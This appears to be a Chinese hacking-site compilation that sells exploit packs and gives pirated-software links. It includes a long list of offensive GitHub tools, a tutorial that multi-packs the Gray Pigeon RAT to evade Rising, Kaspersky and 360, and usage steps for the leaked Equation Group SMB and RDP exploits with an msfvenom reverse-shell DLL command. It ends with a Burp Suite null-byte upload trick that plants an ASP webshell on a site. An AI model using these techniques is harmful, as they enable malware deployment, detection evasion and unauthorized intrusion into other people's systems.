中国骇客云近几年收集的exp,如果您是渗透大手或者想研究exp的可以下载使用它!

中国骇客云近几年收集的exp利用!如果您是一位渗透大手..可以下载使用和研究它!!
最全的exp利用尽在www.anonymouschina.org   www.anonymouschina.com   国际官网:www.hackerschina.org

隐藏内容: ********, 支付¥22.80下载

中国骇客云平台-最新工具-chat.php聊天室搭建+手机局域网渗透工具(中间人攻击)

中国骇客云平台本次软件操作更新 新增:chat聊天室php版本和最新的手机局域网渗透工具!
本次在下载中也给广大朋友添加了   chat.php网页代码的教程…然后就是新增了一个高级破解版本的apk,所有工具可以在安卓机器上正常运行并使用!txt的教程中增加了该版本中其他的工具 链接下载..感谢大家支持!!如果大家有需求,请付费下载!

隐藏内容: ********, 支付¥88.00下载

Ham Radio Deluxe(简称HRD)电台控制 卫星控制 无线电控制!

Ham Radio Deluxe 6.1.4.189更多工具关注中国骇客云平台官方网站!感谢大家一直以来的支持!

Ham Radio Deluxe(简称HRD)是瑞士的一位无线电爱好者Simon Brown(HB9DRV)开发的。由于无线电设备自带的官方软件都具有商业性,苍白的界面、简化的功能、缺乏人性化的操作等等问题限制了设备许多强大实用功能。HB9DRV出于对无线电运动的喜爱,开发出了这个HRD软件,HAM可以根据自己的需要随意修改软件设置。同时软件源码完全开放,没有任何加密,所以从灵活性、扩展性来说都 是非一般软件所能比拟的。它的出现一举成为全球HAM所追捧的对象。

Ham Radio Deluxe(HRD)是一套多种功能集成的专供业余无线电爱好者使用的软件。软件主要涵盖五个模块功能:提供电台操控,通联日志,数字通信,卫星跟踪和天线旋转控制。


Ham Radio Deluxe 6.x | 80.8 MB

Ham Radio Deluxe is structured to support most HF / VHF / UHF amateur radio transceivers and receivers. It currently supports ICOM, Yaesu, Elecraft, FlexRadio, Ten-Tec and Kenwood. A full list is available in the user community. HRD offers a bundle package with ROC for your AEA/Timewave or Kantronics TNC.

Features:
– Built-in logbook,
– Favourites (just like Internet Explorer),
– Integrated DX cluster,
– Customisable band layouts,
– Satellite tracking interface,
– Scanning,
– Synchronise up to ten instances of HRD – tune one radio, the rest follow!

Ham Radio Deluxe 6.1.4.189

OS : Windows XP / Vista / 7 / 8
Language : English

Home Page – http://www.ham-radio-deluxe.com/index.html


Download rapidgator
https://rg.to/file/5827d20c9dadec671a23fa5b8f2f5e9c/Ham.Radio.Deluxe.6.4.0.876.rar.html

Download nitroflare
http://nitroflare.com/view/53EEB2B5239208C/Ham.Radio.Deluxe.6.4.0.876.rar

Download 城通网盘
https://u7940988.ctfile.com/fs/7940988-302806482

Download 百度云
https://pan.baidu.com/s/19kSFNsn3MouGVLruXj_RnA


Download rapidgator
https://rg.to/file/16037777d1d9e3db78e3917159736bb6/Ham.Radio.Deluxe.6.4.0.873.rar.html

Download nitroflare
http://nitroflare.com/view/44C24BC9DB82462/Ham.Radio.Deluxe.6.4.0.873.rar

Download 城通网盘
https://u7940988.ctfile.com/fs/7940988-300279528

Download 百度云
链接: https://pan.baidu.com/s/1FNlFiOgcvYXsvPP8ZbssMg 密码: j2fj


Download rapidgator
https://rg.to/file/1583aaa521b19056ea4c21fe7ea9d5ca/Ham.Radio.Deluxe.6.4.0.843.rar.html

Download nitroflare
http://nitroflare.com/view/BBE7C3FA5D44887/Ham.Radio.Deluxe.6.4.0.843.rar

Download 城通网盘
https://u7940988.ctfile.com/fs/7940988-294586180

Download 百度云
链接: https://pan.baidu.com/s/1vlW0lvRLoZoGGVPe1PqsSw 密码: fe36

中国骇客云平台教你揭秘微信支付存在的一些安全漏洞,之前官网上面有介绍,今天另介绍一种方法提醒网民。

首先这里介绍一种微信的支付安全尝试算是一些支付的一种安全策略漏洞。|
以前官网介绍的是一种二维码直接支付免密支付一种安全漏洞,那么今天官方网站介绍一种更为牛逼的支付免密支付、
教程开始:
首先打开微信,点击+号,点击收付款,点击第一行条形码,点击上面灰色文字显示:“点击可查看付款码数字”而支付胡付款码数字一旦被泄露给黑客或者是有心人,将会造成财产损失。
这里本站测试了 中国石化加油 使用该付款码进行支付,那么这些付款均存在以上的安全支付问题,容易造成付款码泄露。
微信厂商做了实时更新付款码,但是以上安全漏洞还是可以被利用。
条形码就是把付款码存储在条形码中使用机器扫描支付,如果条形码或者以上支付二维码,支付付款码被泄露,那么就会造成用户的财产损失。
这里就不上图了……
更多请关注本站官方网站。

Python工具库 感谢支持更多关注中国骇客云官网

漏洞及渗透练习平台:

WebGoat漏洞练习平台:

https://github.com/WebGoat/WebGoat

webgoat-legacy漏洞练习平台:

https://github.com/WebGoat/WebGoat-Legacy

zvuldirll漏洞练习平台:

https://github.com/710leo/ZVulDrill

vulapps漏洞练习平台:

https://github.com/Medicean/VulApps

dvwa漏洞练习平台:

https://github.com/RandomStorm/DVWA

数据库注入练习平台 :

https://github.com/Audi-1/sqli-labs

用node编写的漏洞练习平台,like OWASP Node Goat:

https://github.com/cr0hn/vulnerable-node

Ruby编写的一款工具,生成含漏洞的虚拟机:

https://github.com/cliffe/secgen

花式扫描器 :

Nmap端口扫描器:

https://github.com/nmap/nmap

本地网络扫描器:

https://github.com/SkyLined/LocalNetworkScanner

子域名扫描器:

https://github.com/lijiejie/subDomainsBrute

https://github.com/aboul3la/Sublist3r

https://github.com/TheRook/subbrute

https://github.com/infosec-au/altdns

linux漏洞扫描:

https://github.com/future-architect/vuls

基于端口扫描以及关联CVE:

https://github.com/m0nad/HellRaiser

漏洞路由扫描器:

https://github.com/jh00nbr/Routerhunter-2.0

迷你批量信息泄漏扫描脚本:

https://github.com/lijiejie/BBScan

Waf类型检测工具:

https://github.com/EnableSecurity/wafw00f

服务器端口弱口令扫描器:

https://github.com/wilson9x1/fenghuangscanner_v3

Fox-scan扫描器:

https://github.com/fengxuangit/Fox-scan/

信息搜集工具 :

社工收集器:

https://github.com/n0tr00t/Sreg

Github信息搜集:

https://github.com/sea-god/gitscan

github Repo信息搜集工具:

https://github.com/metac0rtex/GitHarvester

信息探测及扫描工具:

https://github.com/darryllane/Bluto

内部网络信息扫描器:

https://github.com/sowish/LNScan

远程桌面登录扫描器:

https://github.com/linuz/Sticky-Keys-Slayer

网络基础设施渗透工具

https://github.com/SECFORCE/sparta

SNMAP密码破解:

https://github.com/SECFORCE/SNMP-Brute

WEB:

webshell大合集:

https://github.com/tennc/webshell

渗透以及web攻击脚本:

https://github.com/brianwrf/hackUtils

web渗透小工具大合集:

https://github.com/rootphantomer/hacktoolsfor_me

XSS数据接收平台:

https://github.com/firesunCN/BlueLotus_XSSReceiver

XSS与CSRF工具:

https://github.com/evilcos/xssor

xss多功能扫描器:

https://github.com/shawarkhanethicalhacker/BruteXSS

web漏洞扫描器:

https://github.com/andresriancho/w3af

WEB漏洞扫描器:

https://github.com/sullo/nikto

渗透常用小工具包:

https://github.com/leonteale/pentestpackage

web目录扫描器:

https://github.com/maurosoria/dirsearch

web向命令注入检测工具:

https://github.com/stasinopoulos/commix

自动化SQL注入检查工具:

https://github.com/epinna/tplmap

SSL扫描器:

https://github.com/rbsec/sslscan

安全工具集合:

https://github.com/codejanus/ToolSuite

apache日志分析器:

https://github.com/mthbernardes/ARTLAS

php代码审计工具:

https://github.com/pwnsdx/BadCode

web指纹识别扫描:

https://github.com/urbanadventurer/whatweb

检查网站恶意攻击:

https://github.com/ciscocsirt/malspider

wordprees漏洞扫描器:

https://github.com/wpscanteam/wpscan

固件漏洞扫描器:

https://github.com/misterch0c/firminator_backend

数据库注入工具

https://github.com/sqlmapproject/sqlmap

Web代理:

https://github.com/zt2/sqli-hunter

新版中国菜刀:

https://github.com/Chora10/Cknife

git泄露利用EXP:

https://github.com/lijiejie/GitHack

浏览器攻击框架:

https://github.com/beefproject/beef

自动化绕过WAF脚本:

https://github.com/khalilbijjou/WAFNinja

https://github.com/owtf/wafbypasser

一款开源WAF:

https://github.com/SpiderLabs/ModSecurity

http命令行客户端:

https://github.com/jkbrzt/httpie

浏览器调试利器:

https://github.com/firebug/firebug

DISCUZ漏洞扫描器:

https://github.com/code-scan/dzscan

自动化代码审计工具

https://github.com/wufeifei/cobra

浏览器攻击框架:

https://github.com/julienbedard/browsersploit

tomcat自动后门部署:

https://github.com/mgeeky/tomcatWarDeployer

网络空间指纹扫描器:

https://github.com/nanshihui/Scan-T

burpsuit之J2EE扫描插件:

https://github.com/ilmila/J2EEScan

windows域渗透工具:

mimikatz明文注入:

https://github.com/gentilkiwi/mimikatz

Powershell渗透库合集:

https://github.com/PowerShellMafia/PowerSploit

Powershell tools合集:

https://github.com/clymb3r/PowerShell

powershell的mimikittenz:

https://github.com/putterpanda/mimikittenz

域渗透教程:

https://github.com/l3m0n/pentest_study

Fuzz:

Web向Fuzz工具

https://github.com/xmendez/wfuzz

HTTP暴力破解,撞库攻击脚本

https://github.com/lijiejie/htpwdScan

漏洞利用及攻击框架:

msf框架:

https://github.com/rapid7/metasploit-framework

pocsscan攻击框架:

https://github.com/erevus-cn/pocscan

Pocsuite攻击框架:

https://github.com/knownsec/Pocsuite

Beebeeto攻击框架:

https://github.com/n0tr00t/Beebeeto-framework

漏洞POC&EXP:

ExploitDB官方git版本:

https://github.com/offensive-security/exploit-database

php漏洞代码分析:

https://github.com/80vul/phpcodz

CVE-2016-2107:

https://github.com/FiloSottile/CVE-2016-2107

CVE-2015-7547 POC:

https://github.com/fjserna/CVE-2015-7547

JAVA反序列化POC生成工具:

https://github.com/frohoff/ysoserial

JAVA反序列化EXP:

https://github.com/foxglovesec/JavaUnserializeExploits

Jenkins CommonCollections EXP:

https://github.com/CaledoniaProject/jenkins-cli-exploit

CVE-2015-2426 EXP (windows内核提权):

https://github.com/vlad902/hacking-team-windows-kernel-lpe

use docker to show web attack(php本地文件包含结合phpinfo getshell 以及ssrf结合curl的利用演示):

https://github.com/hxer/vulnapp

php7缓存覆写漏洞Demo及相关工具:

https://github.com/GoSecure/php7-opcache-override

XcodeGhost木马样本:

https://github.com/XcodeGhostSource/XcodeGhost

中间人攻击及钓鱼

中间人攻击框架:

https://github.com/secretsquirrel/the-backdoor-factory

https://github.com/secretsquirrel/BDFProxy

https://github.com/byt3bl33d3r/MITMf

Inject code, jam wifi, and spy on wifi users:

https://github.com/DanMcInerney/LANs.py

中间人代理工具:

https://github.com/intrepidusgroup/mallory

wifi钓鱼:

https://github.com/sophron/wifiphisher

密码破解:

密码破解工具:

https://github.com/shinnok/johnny

本地存储的各类密码提取利器:

https://github.com/AlessandroZ/LaZagne

二进制及代码分析工具:

二进制分析工具

https://github.com/devttys0/binwalk

系统扫描器

https://github.com/quarkslab/binmap

rp:

https://github.com/0vercl0k/rp

Windows Exploit Development工具

https://github.com/lillypad/badger

二进制静态分析工具(python):

https://github.com/bdcht/amoco

Python Exploit Development Assistance for GDB:

https://github.com/longld/peda

对BillGates Linux Botnet系木马活动的监控工具

https://github.com/ValdikSS/billgates-botnet-tracker

木马配置参数提取工具:

https://github.com/kevthehermit/RATDecoders

Shellphish编写的二进制分析工具(CTF向):

https://github.com/angr/angr

针对python的静态代码分析工具:

https://github.com/yinwang0/pysonar2

一个自动化的脚本(shell)分析工具,用来给出警告和建议:

https://github.com/koalaman/shellcheck

基于AST变换的简易Javascript反混淆辅助工具:

https://github.com/ChiChou/etacsufbo

EXP编写框架及工具:

二进制EXP编写工具:

https://github.com/t00sh/rop-tool

CTF Pwn 类题目脚本编写框架:

https://github.com/Gallopsled/pwntools

an easy-to-use io library for pwning development:

https://github.com/zTrix/zio

跨平台注入工具:

https://github.com/frida/frida

哈希长度扩展攻击EXP:

https://github.com/citronneur/rdpy

隐写:

隐写检测工具

https://github.com/abeluck/stegdetect

各类安全资料:

data_hacking合集:

https://github.com/ClickSecurity/data_hacking

mobile-security-wiki:

https://github.com/exploitprotocol/mobile-security-wiki

书籍《reverse-engineering-for-beginners》:

https://github.com/veficos/reverse-engineering-for-beginners

一些信息安全标准及设备配置:

https://github.com/luyg24/IT_security

APT相关笔记:

https://github.com/kbandla/APTnotes

Kcon资料:

https://github.com/knownsec/KCon

《DO NOT FUCK WITH A HACKER》:

https://github.com/citypw/DNFWAH

各类安全脑洞图:

https://github.com/phith0n/Mind-Map

信息安全流程图:

https://github.com/SecWiki/sec-chart/ tree/294d7c1ff1eba297fa892dda08f3c05e90ed1428

各类CTF资源

近年ctf writeup大全:

https://github.com/ctfs/write-ups-2016

https://github.com/ctfs/write-ups-2015

https://github.com/ctfs/write-ups-2014

fbctf竞赛平台Demo:

https://github.com/facebook/fbctf

ctf Resources:

https://github.com/ctfs/resources

ctf及黑客资源合集:

https://github.com/bt3gl/My-Gray-Hacker-Resources

ctf和安全工具大合集:

https://github.com/zardus/ctf-tools

ctf向 python工具包

https://github.com/P1kachu/v0lt

各类编程资源:

大礼包(什么都有):

https://github.com/bayandin/awesome-awesomeness

bash-handbook:

https://github.com/denysdovhan/bash-handbook

python资源大全:

https://github.com/jobbole/awesome-python-cn

git学习资料:

https://github.com/xirong/my-git

安卓开源代码解析

https://github.com/android-cn/android-open-project

python框架,库,资源大合集:

https://github.com/vinta/awesome-python

JS 正则表达式库(用于简化构造复杂的JS正则表达式):

https://github.com/VerbalExpressions/JSVerbalExpressions

Python:

python 正则表达式库(用于简化构造复杂的python正则表达式):

https://github.com/VerbalExpressions/

python任务管理以及命令执行库:

https://github.com/pyinvoke/invoke

python exe打包库:

https://github.com/pyinstaller/pyinstaller

Veil-Evasion免杀项目:

https://github.com/Veil-Framework/Veil-Evasion

py3 爬虫框架:

https://github.com/orf/cyborg

一个提供底层接口数据包编程和网络协议支持的python库:

https://github.com/CoreSecurity/impacket

python requests 库:

https://github.com/kennethreitz/requests

python 实用工具合集:

https://github.com/mahmoud/boltons

python爬虫系统:

https://github.com/binux/pyspider

科学上网:

科学上网工具

https://github.com/XX-net/XX-Net

福利:

微信自动抢红包动态库

https://github.com/east520/AutoGetRedEnv

微信抢红包插件(安卓版)

https://github.com/geeeeeeeeek/WeChatLuckyMoney

hardsed神器:

https://github.com/yangyangwithgnu/hardseed

甲方安全工程师生存指南

web索引及日志搜索工具:

https://github.com/thomaspatzke/WASE

开源日志采集器:

https://github.com/wgliang/logcool

扫描CS结构的web debuger

https://github.com/Kozea/wdb

恢复sqlite数据库删除注册信息:

https://github.com/aramosf/recoversqlite/

gps欺骗检测工具:

https://github.com/zxsecurity/gpsnitch

应急处置响应框架:

https://github.com/biggiesmallsAG/nightHawkResponse

web安全开发指南:

https://github.com/FallibleInc/security-guide-for-developers

各个知名厂商漏洞测试报告模板:

https://github.com/juliocesarfort/public-pentesting-reports linux下恶意代码检测包:

https://github.com/rfxn/linux-malware-detect

操作系统运行指标可视化框架:

https://github.com/facebook/osquery

恶意代码分析系统:

https://github.com/cuckoosandbox/cuckoo

定期搜索及存储web应用:

https://github.com/Netflix/Scumblr

事件响应框架:

https://github.com/google/grr

综合主机监控检测平台:

https://github.com/ossec/ossec-hids

分布式实时数字取证系统:

https://github.com/mozilla/mig

Microsoft & Unix 文件系统及硬盘取证工具:

https://github.com/sleuthkit/sleuthkit

蜜罐:

SSH蜜罐:

https://github.com/desaster/kippo

蜜罐集合资源:

https://github.com/paralax/awesome-honeypots

kippo进阶版蜜罐:

https://github.com/micheloosterhof/cowrie

SMTP 蜜罐:

https://github.com/awhitehatter/mailoney

web应用程序蜜罐:

https://github.com/mushorg/glastopf

数据库蜜罐:

https://github.com/jordan-wright/elastichoney

web蜜罐:

https://github.com/atiger77/Dionaea

远控:

用gmail充当C&C服务器的后门

https://github.com/byt3bl33d3r/gcat

开源的远控:

https://github.com/UbbeLoL/uRAT

c#远控:

https://github.com/hussein-aitlahcen/BlackHole

中国骇客云教大家如何免杀

免杀,一个在黑客界永不过时的话题。从木马和杀毒软件的第一次交锋开始就始终没有中断过,黑客程序开发者和杀毒软件的技术人员的始终在较量着。面对强大的杀毒软件,病毒的免杀就显的尤为重要。免杀的方式基本分为三种:修改特征码、添加花指令和壳,最后一次,危险漫步就来和大家谈谈加壳这种最常见的免杀方式。

有些动植物长着坚硬的外壳,因为它们都着脆弱的身体,需要用坚硬的外壳来保护自己。根据这一理论,一种叫壳的程序出现了。壳诞生的初衷是为了保护自己的程序不被破解和修改,病毒作为一种特殊的程序,壳同样也可以用于病毒的保护。通过这一现象,壳的用途出现了一个翻天覆地的转变。现在提到壳,大家都会想到病毒的免杀。

一般来说,壳分为两种:加密壳和压缩壳。加密壳主要的作用是对程序进行加密,但加密后程序体积会变大。压缩壳主要用于对程序的压缩,能够减小程序的体积。另外,还有一些特殊的壳既可以加密,同时也可以压缩。

加壳不失为一种不错的免杀方式,但随着杀毒软件的普及和病毒库的日益扩大,越来越多的加壳程序被列入病毒的行列。那么我们还能使用这些壳为病毒免杀吗?YES!但我们要稍微动动手脚了。

如果说单一的添加壳,用不了多久就会被杀,人品不行的一下就被主动防御和云查杀给秒了…

我们可以把一些壳混合起来为程序加壳,也就是题目提到的复合加壳,这样也可以起到免杀的效测试才行。

W(%EL[ZASU3CU`%{N[J23QV.png

我以给灰鸽子加壳为例,给大家一个复合加壳的思路。需要注意的是:要加壳的文件不能是RAR格式的,我这里使用的是没有UPX压缩的灰鸽子。先用加密壳加载灰鸽子服务端,我用到的是国外的一款名为“KeyCrypter”。这个壳的免杀效果非常不错,而且功能强大。但要注意的是:尽量选择一些不常见的加壳程序,加壳要保证一定的数量,不能只加一两个壳。

而且加壳后不等于100%免杀,还要靠我们不断分析测试才行。中国骇客云官方网站hackerschina.org

我以给灰鸽子加壳为例,给大家一个复合加壳的思路。需要注意的是:要加壳的文件不能是

RAR格式的,我这里使用的是没有UPX压缩的灰鸽子。先用加密壳加载灰鸽子服务端,我用到的是国外的一款名为“KeyCrypter”。这个壳的免杀效果非常不错,而且功能强大。

简单介绍一下使用方法,左边是选择要加壳的文件,右边是设置输出文件位置。把下面所有的选项全部选上,这些选项的意思是:反编译、反沙盘等等,我们选上就可以了。然后点击“Crypt File”就为灰鸽子加上了加密壳。

现在还不能添加压缩壳,因为每个壳的兼容性都不一样,我们必须进行资源释放处理。下面我们要使用到“FreeRes”。释放资源后选择“功能”中的“建立可编辑资源”对文件进行资源重建。

接下来我们就用到压缩壳,我选用的是“蚂蚁加壳工具和Mini_pack”,因为他们都是压缩壳,经过我测试,这两个壳在压缩时不需要进行资源释放处理。勾好配置后,找到服务端后进行

二次加壳。压缩完毕,用加壳后的灰鸽子过一下瑞星、卡巴和360,都没有报毒。

中国骇客云平台最新公开方程式组织黑客工具,赶紧下载吧!~~~~

GitHub:https://github.com/x0rz/EQGRP_Lost_in_Translation

网盘下载地址:https://yadi.sk/d/NJqzpqo_3GxZA4

解压密码”Reeeeeeeeeeeeeee”

Start.jar //图形界面

EXPLODINGCAN 是 IIS 6.0 远程漏洞利用工具
ETERNALROMANCE 是 SMB1 的重量级利用,可以攻击开放了 445 端口的 Windows XP, 2003, Vista, 7, Windows 8, 2008, 2008 R2 并提升至系统权限。
除此之外 ERRATICGOPHER 、ETERNALBLUE 、ETERNALSYNERGY 、ETERNALCHAMPION 、EDUCATEDSCHOLAR、 EMERALDTHREAD 等都是 SMB 漏洞利用程序,可以攻击开放了 445 端口的 Windows 机器。
ESTEEMAUDIT 是 RDP 服务的远程漏洞利用工具,可以攻击开放了3389 端口的 Windows 机器。
FUZZBUNCH 是一个类似 MetaSploit 的漏洞利用平台。
ODDJOB 是无法被杀毒软件检测的 Rootkit 利用工具。
ECLIPSEDWING 是 Windows 服务器的远程漏洞利用工具。
ESKIMOROLL 是 Kerberos 的漏洞利用攻击,可以攻击 Windows 2000/2003/2008/2008 R2 的域控制器。

Explodingcan IIS漏洞利用工具,只对Windows 2003有影响Eternalromance   SMB 和 NBT漏洞利用工具,影响端口139445 Emphasismine   通过IMAP漏洞攻击,攻击的默认端口为143Englishmansdentist   通过SMTP漏洞攻击,默认端口25Erraticgopher 通过RPC漏洞攻击,端口为445Eskimoroll   通过kerberos漏洞进行攻击,默认攻击端口88Eclipsedwing   MS08-67漏洞利用工具Educatedscholar   MS09-050漏洞利用工具Emeraldthread MB和 Netbios 漏洞利用工具,使用445端口和 139端口Zippybeer   SMTP漏洞利用工具,默认端口 445Eternalsynergy   SMB漏洞利用工具,默认端口 445Esteemaudit   RDP漏洞利用工具,默认攻击端口为3389

 

使用方法:

注意,必须安装32位python2.6相关版本,其他版本不奏效。

  1. 下载python2.6并安装
  2. 下载pywin32并安装
  3. 将C:\Python26添加到环境变量PATH中。

修改\windows\fb.py

注释掉:

 #addplugins(fb, "ListeningPost", LP_DIR,      EDFPlugin)

 

将windows\lib\x86-Windows | x64-Windows  加入到系统环境变量

    1.生成dll命令:msfvenom -p windows/x64/shell_reverse_tcp   LHOST=x.x.x.x LPORT=8888 -f dll > shell.dll

 

转载文章请注明,转载自:中国骇客平台官网www.hackerschina.org

 

XSSF是一款XSS漏洞测试平台,该产品可以把XSS漏洞的真实危害暴露出来。这个产品为教学、渗透测试和合法的研究服务。

XSSF通过XSS漏洞与目标浏览器建立连接进行更加深入的攻击利用测试。

XSSF提供强大的API库,并且集成于Metasploit渗透测试框架中。

Windows安装XSSF模块
下载安装Metasploit windows免费版:
http://downloads.metasploit.com/data/releases/metasploit-latest-windows-installer.exe

安装完成后将下xssf源码放到Metasploit安装目录msf3下,同样将XSSF文件夹中的data、lib、modules、plugins与msf3下的文件夹合并即可。

下载xssf源代码:选择最新的3.0下载,下载地址  xssf-3.0

运行metasploit客户端,加载xssf模块:msf > load xssf

BackTrack 5 Metasploit更新方法

虚拟机运行BackTrack5 r3在更新Metasploit时卡在pg-0.15.1,升级报错无法正常升级。

原因是msf并没有用BT5内置的Ruby,而是利用自带的Ruby版本为1.9.1,已经很古老了……所以升级系统的Ruby版本也会无济于事,但是按照下面的步骤更新,即可将msf更新到最新。

解决办法:

找到以下文件打开(注:32位、64位)

然后再找到:

修改为:

然后切换至/opt/metasploit/msf3再运行/opt/metasploit/ruby/bin/bundle install
最后msfupdate!

中国骇客云之killall万能钥匙3.2.16 wifi万能钥匙显密码 去广告

说明:万能钥匙,不是破解密码,是分享wifi密码的软件。

通过这个软件可以获取到别人分享过的wifi从而连接上无线网。但是这个软件广告比较多,并且并不会显示wifi密码。

所以就有了这个修改版,这个修改版去除了程序广告,并且可以把这个wifi密码显示出来。

本软件根据凯旋大神的去广告版本修改,再次表示感谢,绝对同样是深改,其实这是废话了,参考的肯定是完全一致的,和凯旋版本对比,修改的只会多不会少。并且还多出来一个显示密码功能。当然本人也就一部手机,有些细节没办法测试的面面俱到。可能有些机型有些小问题,这个是没办法避免的。。。。

修改给自己使用的版本,顺便分享一下,其他机型请自测,如发现问题请反馈,谢谢!

1、去除界面广告,扁平化图标,更加美观,极致精简仅有6M。

2、去除所有不必要的敏感权限和服务项。

3、去除状态栏通知和退出提醒。

4、去除后台下载广告行为,并让LBE安全大师,360手机卫士扫描不到广告提示。

5、去除地图验证,可以查看地图。

6、去除默认分享密码行为。

7、修改为共存版可与原版同时安装,名称为万能钥匙。

8、归纳软件产生的文件为/Android/data/com.killall.wifilocating/目录,卸载软件会自动清除。

9、不用ROOT手机就能够显示密码,当首次连接上热点自动弹出密码。

题外话:看到有些网友说不知道这个美化版怎么显示密码。只有在第一次连接上一个从未连接过的新wifi热点就弹出密码的。点击“万能钥匙自动连接”,获取到密码就会弹出密码,之后就记住密码不会弹出密码了。如果第一次没看清楚。可以对wifi点一下选择“忘记网络”,这样“万能钥匙自动连接”选项又出来了,再次点击“万能钥匙自动连接”就会重新弹出密码。只有点击“万能钥匙自动连接”才会弹出密码的。另外,之前发布几个版本,有些小白以为LBE安全大师和360安全卫士扫描到修改版万能钥匙有广点通广告。就以为软件广告没有去除干净。其实这只是smali里面一些失去功能的广告代码,这类安全软件扫描到这些失去功能的广告代码也提示有广告,其实去广告只要去除了apk活动项,这些广告代码就相当于是死的了,不会产生广告行为的。软件有没有广告是在界面看得到的。所以这次为了防止那些什么都不懂的小白吐槽,就去除了这些广告代码,虽然也没多大意义。但是估计小白和某些处女座会喜欢。嘿嘿。。。另外请某些素质低的人不要骂人,不喜欢就不要用,没逼你使用。下面直接公布下载地址。支持就不用说了,你们懂的。。。。

可能被修改的太狠 了。万能钥匙从3.2.16开始更新了SO签名校验,我对SO修改这块技术太渣,分析了很久找不到绕过方法,就懒得分析了,所以直接使用空道大神的HOOK模块给通杀签名校验了,这样可能导致某些不支持HOOK的X86型号的安卓手机没办法搜到可用热点,但是支持绝大多数手机的。如果发现搜索不到可用的热点,建议使用我之前修改的旧版。万能钥匙这个软件没必要一直追新,实际上大多时候只是更新了个版本号,软件界面和广告,wifi密码服务器还是一样的,并不会影响使用效果,也不会能够多扫描到可用热点。

因法律法规及政策原因,已停止提供下载

中国骇客云之Burp suite网站攻击利器快速处理上传截断

Burp suite是一个安全测试框架,它整合了很多的安全工具,对于渗透的朋友来说,是不可多得的一款囊中工具包,今天笔者带领大家来解读如何通过该工具迅速处理“截断上传”的漏洞。如果对该漏洞还不熟悉,就该多去网上学习下。

由于该工具是通过Java写的,所以需要安装JDK,关于JDK的安装,笔者简单介绍下。基本是傻瓜化安装,安装完成后需要简单配置下环境变量,右键”我的电脑”->”属性”一>”高级”一>”环境变量”,在系统变量中查找Path,然后点击编辑,把JDK的bin目录写在path的最后即可。

通过CMD执行下javac看是否成功安装。安装配置成功则会显示下图信息。

这里的测试网址是笔者帮朋友测试某站点时获取的,登陆后台后可以发表新闻,但是只能上传图片,然后发现新闻的图片目录在upload/newsimg下。

后台有个”网站资料设置”的功能,可以自行定义新闻图片的路径,但是当尝试把新闻图片路径改为“upload/newsimg.asp/”时,上传图片竟然上传失败了,所以这种方法失效。

接下来我们尝试上传截断漏洞,可能大家经常用的是通过WSockExpert抓包,修改后通过nc来提交获取shell,但是大家会发现那样有点繁琐,我们看看今天的方法是多么高效!

QQ截图20170314135253.png

首先运行Burp suite允许burpsuite.jar,然后点击“proxy”标签,会发现burp suite默认的代理监听端口为8080,如果怕跟自己电脑上的某个端口冲突的话,可以点击“edit”进行编辑。笔者使用默认端口。

然后打开本地浏览器的代理设置的地方,IE一般为“工具”->“Internet选项”->“连接”->“局域网设置”,其他浏览器大致相同。

设置代理之后,我们到后台的某个上传新闻图片的地方上传一个图片木马,我这里的图片木马为asp一句话。

点击上传之后,我们到proxy的“history”选项,会发现该(本文来自危险漫步博客)网站的某个POST提交请求,我们选中该链接后,右键选择“send to repeater”。

我们会发现刚才提交的请求的数据包,那么我们看一下,有一项是上传路径的地方,我们以前进行截断上传的时候经常修改这个地方,这次也不例外,我们把上传路径改为”upload/shell.asp”后面有一个空格。

然后选择”hex”进入16进制编辑模块,将空格的16进制20改为00,即null。

然后点击上方的“go”即可进行数据包的提交,提交成功后会返回提交的路径,笔者通过菜刀就直接连接到一句话后门了。大家进行测试吧!